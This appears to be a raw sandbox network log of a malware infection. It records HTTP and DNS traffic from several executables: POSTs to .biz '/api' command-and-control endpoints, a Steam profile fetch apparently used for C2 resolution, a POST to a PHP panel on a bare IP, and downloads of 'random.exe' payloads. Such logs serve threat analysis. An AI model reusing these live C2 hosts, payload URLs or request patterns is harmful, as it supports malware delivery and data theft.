Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Fri, 06 Dec 2024 02:16:55 GMT
Content-Length: 35602
Connection: keep-alive
Set-Cookie: sessionid=12c6100f582b03671b40059f; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
POST

https://covery-mover.biz/api

BhD8htX.exe

Remote address:

172.67.206.64:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: covery-mover.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=e1tmrp88kc181c1on5k4nn2n88; expires=Mon, 31-Mar-2025 20:03:34 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=47nJqZnPbJD6P1%2FjV%2Bwyr7MQeM75j2nEohf5PEeFJmZOD%2Bqq%2BGtKhNVb00KIVO6FoL69hoYisNM1mynl%2F6NHVCiS0VYi00udyuxxEyxAio4J2S1CEqepJ0IZv7K7CvLLdmwv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c6d1192b93f3-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47869&min_rtt=47023&rtt_var=11254&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=605&delivery_rate=82696&cwnd=253&unsent_bytes=0&cid=ff5ccf62299d4079&ts=1356&x=0"
DNS

marshal-zhukov.com

f56e441c8f.exe

Remote address:

8.8.8.8:53

Request

marshal-zhukov.com

IN A

Response

marshal-zhukov.com

IN A

172.67.160.80

marshal-zhukov.com

IN A

104.21.82.174
POST

https://marshal-zhukov.com/api

2M4078.exe

Remote address:

172.67.160.80:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: marshal-zhukov.com

Response

HTTP/1.1 403 Forbidden

Date: Fri, 06 Dec 2024 02:16:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JX1jjqG2cr4FKh0SUCfyy1bU4NVmplK%2FCkFxbDA7K3j9oziyMFaVu3vOQb882FvgIthwTg%2FWsxla8E9mY%2FYo8jSaQBMHlJz0yKoPZoWL1aqc8pwi10db%2F6rpSdl6z4TpqlsnHo0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c6d3ccd894c1-LHR
POST

https://marshal-zhukov.com/api

2M4078.exe

Remote address:

172.67.160.80:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=GUWXk5E5QOmHQuPkHrtObFA.HbvTp2jwlATnRULWzVg-1733451415-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 53
Host: marshal-zhukov.com

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=kioi8aoqnsjul4ajgqgao71agj; expires=Mon, 31-Mar-2025 20:03:35 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H9um7amWnDax1qfGbke8N4jG7mjIF2VEcSdAz5SP0cxAfwQObUukiwqUycsHK0BTZezSsbzzJLHvUksHUOybxesaT2aO2PxL4czgP4r2Awdlf12VXYXMB%2FCsHmkQVYL4cjKhkMA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c6d8787f94c1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=61648&min_rtt=49159&rtt_var=10943&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8578&recv_bytes=1075&delivery_rate=126619&cwnd=257&unsent_bytes=0&cid=3993e6105c5b5f26&ts=1709&x=0"
DNS

155.143.214.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

155.143.214.23.in-addr.arpa

IN PTR

Response

155.143.214.23.in-addr.arpa

IN PTR

a23-214-143-155deploystaticakamaitechnologiescom
DNS

80.160.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.160.67.172.in-addr.arpa

IN PTR

Response
POST

https://dare-curbys.biz/api

BhD8htX.exe

Remote address:

104.21.43.156:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: dare-curbys.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=s0gghr7i4bitgjpujvg8hmbo0g; expires=Mon, 31-Mar-2025 20:03:35 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFlUESRevaFl85vnUeYbIVJDT%2FmfIbvlGOr0jlSqj0B7B9XhFTR8IH17BN2bsjwkM5KWE1W%2Bq%2F9QJjESzvQzsuOosdS9%2F4b18n7wJavieMOixmAHe9Unc3281%2BzYAM%2F7VSg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c6da4b5994a1-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47953&min_rtt=47121&rtt_var=11511&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3296&recv_bytes=603&delivery_rate=84474&cwnd=253&unsent_bytes=0&cid=46ff26f58b1c9b5e&ts=640&x=0"
DNS

228.249.119.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

228.249.119.40.in-addr.arpa

IN PTR

Response
POST

https://print-vexer.biz/api

BhD8htX.exe

Remote address:

104.21.35.246:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: print-vexer.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=tif5gjo8tc4vh76ur7l23d1qtq; expires=Mon, 31-Mar-2025 20:03:36 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=563R3RMzHTwuFve1jf6lne0m7zRrpqI9dZKRfC%2BIDFBmvBjFbG%2B5LuIPK%2FCxcHpdDSvH%2Bqql4vr%2BwigcahpAogZILVwMhJz%2FgXjfct1NT4pBlyECYPjsrY2afwOQrCSY8E0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c6dede46cd4b-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47899&min_rtt=47278&rtt_var=11053&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3295&recv_bytes=603&delivery_rate=81601&cwnd=253&unsent_bytes=0&cid=1badd49216f6e82d&ts=389&x=0"
GET

https://steamcommunity.com/profiles/76561199724331900

BhD8htX.exe

Remote address:

23.214.143.155:443

Request

GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Fri, 06 Dec 2024 02:16:58 GMT
Content-Length: 35602
Connection: keep-alive
Set-Cookie: sessionid=e881c9735643b8cd409f922b; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
POST

https://marshal-zhukov.com/api

BhD8htX.exe

Remote address:

172.67.160.80:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: marshal-zhukov.com

Response

HTTP/1.1 403 Forbidden

Date: Fri, 06 Dec 2024 02:16:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tb%2FinMDPU2QrBuS3wVEJKSWuop5VkheAM2VYExMMuxN6BO4FPAPqGKuk5QTzS%2BVaa2o2YbYJ9Z8DXykiAruNmfjiH%2BA8Nm2Gr8tLoHokPXJiUnaHvbG4JF0cqMQ4sj97kScU5A0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c6e58a3394d2-LHR
POST

https://marshal-zhukov.com/api

BhD8htX.exe

Remote address:

172.67.160.80:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=IpTVhzhKheYz9NDiNAVYbnbRkaz7D_mT6hW29Wnov8g-1733451418-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 49
Host: marshal-zhukov.com

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=qp2un8m74go375p7b53pg7bpb7; expires=Mon, 31-Mar-2025 20:03:37 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ft45%2B%2B9ugZvTXFr69uia7ID3PaXygZdAhlqitssK9Ipv%2FIRcRB6viWSOE79yYw1kWqAn2BOWwAHKwVgF14uS48dNzR2bhCu%2By18unSYvjbJO5DQQoO5I0iQM6oBwCnCbK%2BApYkY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c6e69adc94d2-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=51963&min_rtt=48483&rtt_var=6551&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8575&recv_bytes=1071&delivery_rate=150446&cwnd=257&unsent_bytes=0&cid=46921dd0b2d0feab&ts=491&x=0"
GET

http://185.215.113.206/

3Z39A.exe

Remote address:

185.215.113.206:80

Request

GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/c4becf79229cb002.php

3Z39A.exe

Remote address:

185.215.113.206:80

Request

POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGDGIEGHJEGIDGCAFBFC
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:16:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

206.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.113.215.185.in-addr.arpa

IN PTR

Response
GET

http://185.215.113.16/luma/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /luma/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:17:02 GMT
Content-Type: application/octet-stream
Content-Length: 1819648
Last-Modified: Fri, 06 Dec 2024 01:42:37 GMT
Connection: keep-alive
ETag: "6752568d-1bc400"
Accept-Ranges: bytes
GET

http://185.215.113.16/steam/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /steam/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:17:07 GMT
Content-Type: application/octet-stream
Content-Length: 5222400
Last-Modified: Fri, 06 Dec 2024 01:42:46 GMT
Connection: keep-alive
ETag: "67525696-4fb000"
Accept-Ranges: bytes
GET

http://185.215.113.16/well/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /well/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:17:36 GMT
Content-Type: application/octet-stream
Content-Length: 967680
Last-Modified: Fri, 06 Dec 2024 01:40:49 GMT
Connection: keep-alive
ETag: "67525621-ec400"
Accept-Ranges: bytes
GET

http://185.215.113.16/off/random.exe

skotes.exe

Remote address:

185.215.113.16:80

Request

GET /off/random.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 06 Dec 2024 02:17:39 GMT
Content-Type: application/octet-stream
Content-Length: 2741760
Last-Modified: Fri, 06 Dec 2024 01:41:15 GMT
Connection: keep-alive
ETag: "6752563b-29d600"
Accept-Ranges: bytes
DNS

16.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.113.215.185.in-addr.arpa

IN PTR

Response
POST

https://atten-supporse.biz/api

f56e441c8f.exe

Remote address:

172.67.165.166:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: atten-supporse.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:17:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=rfof7d1j0pohqh5g9p9b2lslav; expires=Mon, 31-Mar-2025 20:03:45 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Yyb47Po6NokRmMJcGuKC0olBFhPtsQlSF7kZdis5wzgdKRp5t8Ifk3wRazxh2CFyTjySXorssIgP1wtpyUW4j75t7Cip4zY1hdVEmbrUYlu8vrnuMCdqnUnTQZLQqaNmpI0BN0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c7148bd0beb9-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=48469&min_rtt=47137&rtt_var=12330&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3306&recv_bytes=609&delivery_rate=80346&cwnd=253&unsent_bytes=0&cid=0596e63bb273297f&ts=575&x=0"
POST

https://se-blurry.biz/api

f56e441c8f.exe

Remote address:

104.21.81.153:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: se-blurry.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:17:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=qqg05agjcvno3ltkf6q31sdri6; expires=Mon, 31-Mar-2025 20:03:45 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3JpQpXB8Vv1teJu6CBemPrtUYIjskTH0clKlOeqw0gX4TEZGE22%2FZ%2Bzd2YF9ARjHTeHIC%2BO0O23clXOfNvGCRDW0qb%2FRBqbKLYr9DfnBtm8LCIX2%2FMLrRXd%2FncqGDWzb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c719181363f5-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=63516&min_rtt=59519&rtt_var=19589&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3289&recv_bytes=599&delivery_rate=62260&cwnd=253&unsent_bytes=0&cid=2414351aa7b7f140&ts=363&x=0"
POST

https://zinc-sneark.biz/api

f56e441c8f.exe

Remote address:

172.67.136.167:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: zinc-sneark.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:17:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=s57crqho0e2ask1pjjm5p08usk; expires=Mon, 31-Mar-2025 20:03:46 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=17fULF%2FkzA2kCvXva05OTxOiT57yJf081Ul4Eu3vXeF%2BGCRLag68sEEwcIqw3%2FzqcBdrhkdA72mTgJei0ddlUKaPGQmCfWrad5NcFx1Gwp%2FgQd%2F4mahnIIOBUe%2FeoJm7lds%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c71e08ce3d88-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=52747&min_rtt=50579&rtt_var=15440&sent=7&recv=7&lost=0&retrans=1&sent_bytes=3554&recv_bytes=603&delivery_rate=76809&cwnd=254&unsent_bytes=0&cid=bcf839cddfe87b72&ts=707&x=0"
POST

https://dwell-exclaim.biz/api

f56e441c8f.exe

Remote address:

172.67.153.96:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: dwell-exclaim.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:17:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=25s2tpfgqg7f50jidfkvtt7l4m; expires=Mon, 31-Mar-2025 20:03:48 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E9juQgyFVaniyVBfekbkp8m5z6ciAHCq%2B6OPw8LTsOJksYVEepoaOm9wePcUb6LPEd1qJsK0pJSuSQ561qmyKugm9lejrSCOCy%2BmbYsg7EwMuK3%2B0O2f28nPqf4ysLVXpd2nsw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c7297f1c7783-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=51283&min_rtt=50870&rtt_var=19902&sent=7&recv=6&lost=0&retrans=1&sent_bytes=3562&recv_bytes=607&delivery_rate=75143&cwnd=254&unsent_bytes=0&cid=3d68d811876ba2ce&ts=1694&x=0"
DNS

UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY

Dr.com

Remote address:

8.8.8.8:53

Request

UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY

IN A

Response
DNS

UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY

Dr.com

Remote address:

8.8.8.8:53

Request

UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY

IN A
DNS

UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY

Dr.com

Remote address:

8.8.8.8:53

Request

UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY

IN A
POST

https://formy-spill.biz/api

f56e441c8f.exe

Remote address:

172.67.173.74:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: formy-spill.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:17:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=gd9akri4d04hn4lc9pt9oi5efm; expires=Mon, 31-Mar-2025 20:03:51 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5JTHaHAgDX7O1DGr%2Bdt7vUdFjAKnfK4VntsUpiCIn8P0GIQgzZ6DzZsNKp0XCvbXlvHzKN5mo7zzpa7poHg%2F%2Fk4jnpkO9ImrS25ik%2FA4hp5WaWNcQpas9y3wj6mC7acoGH4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c73cfc2276c3-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=447773&min_rtt=60542&rtt_var=336004&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3294&recv_bytes=603&delivery_rate=65043&cwnd=253&unsent_bytes=0&cid=e48a7cafc9119f60&ts=1711&x=0"
DNS

197.87.175.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.87.175.4.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
POST

https://covery-mover.biz/api

f56e441c8f.exe

Remote address:

172.67.206.64:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: covery-mover.biz

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 02:17:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=i7ts9rlcsl5cvc46h4h6o4q7ql; expires=Mon, 31-Mar-2025 20:03:54 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0zxOtiv5t4%2FwC3%2FbjWhzYdjCdUJcPimGex7TkZtzxR6at2ShlTtWRcAXRj0c74E3%2FQqq6CvlxYU1jEDfUmH6QqAK0uFFEyvLSW4SSaZEMk7uxvs1AVrsr9kzryq6qBjaNkYG"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ed8c7489b1794f6-LHR
